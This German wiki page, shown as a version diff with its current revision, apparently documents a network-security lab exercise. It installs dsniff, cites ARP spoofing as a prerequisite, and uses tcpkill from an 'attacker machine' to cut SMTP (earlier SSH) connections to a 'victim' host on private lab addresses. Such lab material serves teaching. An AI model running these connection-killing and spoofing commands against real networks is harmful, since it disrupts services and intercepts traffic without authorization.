Tcpkill: Unterschied zwischen den Versionen

Aus Xinux Wiki
Zur Navigation springen Zur Suche springen
 
(6 dazwischenliegende Versionen von 2 Benutzern werden nicht angezeigt)
Zeile 1: Zeile 1:
 +
=Install=
 +
*apt install dsniff
 
=Vorraussetung Arp Spoofing=
 
=Vorraussetung Arp Spoofing=
 
*[[Arpspoofing mit Ettercap]]
 
*[[Arpspoofing mit Ettercap]]
=SSH Killen=
+
 
 +
=SMTP Killen=
 
Auf dem Angriffrechner
 
Auf dem Angriffrechner
==Port herausfinden==
+
=Verbindung killen=
*tcpdump -ni eth0 host 10.81.1.9 and host 10.81.3.1
+
*tcpkill -i eth0 host 10.0.10.104 and port 25
  11:36:46.940532 IP 10.81.1.9.8472 > 10.81.3.1.46354: Flags [P.], seq 3918:3994, ack 3154, win 272, options [nop,nop,TS val 2668654015 ecr 1300733], length 76
+
=Client zum Opfer=
  11:36:46.940810 IP 10.81.3.1.46354 > 10.81.1.9.8472: Flags [.], ack 3994, win 320, options [nop,nop,TS val 1300734 ecr 2668654015], length 0
+
*telnet 10.0.10.104 25
==Verbindung killen==
+
  Trying 10.0.10.104...
*tcpkill -i eth0 host 10.81.3.1 and port
+
  Connected to 10.0.10.104.
 +
Escape character is '^]'.
 +
220 opfer.xinux.org ESMTP Postfix (Ubuntu)
 +
Connection closed by foreign host.

Aktuelle Version vom 8. Juni 2021, 09:01 Uhr

Install

  • apt install dsniff

Vorraussetung Arp Spoofing

SMTP Killen

Auf dem Angriffrechner

Verbindung killen

  • tcpkill -i eth0 host 10.0.10.104 and port 25

Client zum Opfer

  • telnet 10.0.10.104 25
Trying 10.0.10.104...
Connected to 10.0.10.104.
Escape character is '^]'.
220 opfer.xinux.org ESMTP Postfix (Ubuntu)
Connection closed by foreign host.
Abgerufen von „http://wiki.ixheim.de/index.php?title=Tcpkill&oldid=23541